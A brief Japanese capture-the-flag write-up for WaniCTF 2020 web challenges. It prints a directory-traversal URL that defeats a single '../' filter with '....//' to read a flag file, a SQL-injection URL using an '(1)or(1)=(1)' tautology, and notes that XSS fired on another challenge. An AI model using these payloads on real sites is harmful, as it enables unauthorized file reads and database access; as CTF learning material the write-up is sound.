WaniCTF 2020: Write up
Web
DevTools_1
ソースコード見るだけ。
DevTools_2
問題文の通りにここを書き換えるだけ
Simple Memo
../
を1回replaceされるだけなので....//
とすることでbypassできる
問題文にある通りディレクトリトラバーサルの脆弱性があるのでhttps://simple.wanictf.org/index.php?file=....//....//....//....//....//var/www/html/flag.txt
にアクセスするとflagが取れる。
striped table
適当にやったらxss発火した
SQL Challenge 1
https://sql1.wanictf.org/index.php?year=(1)or(1)=(1)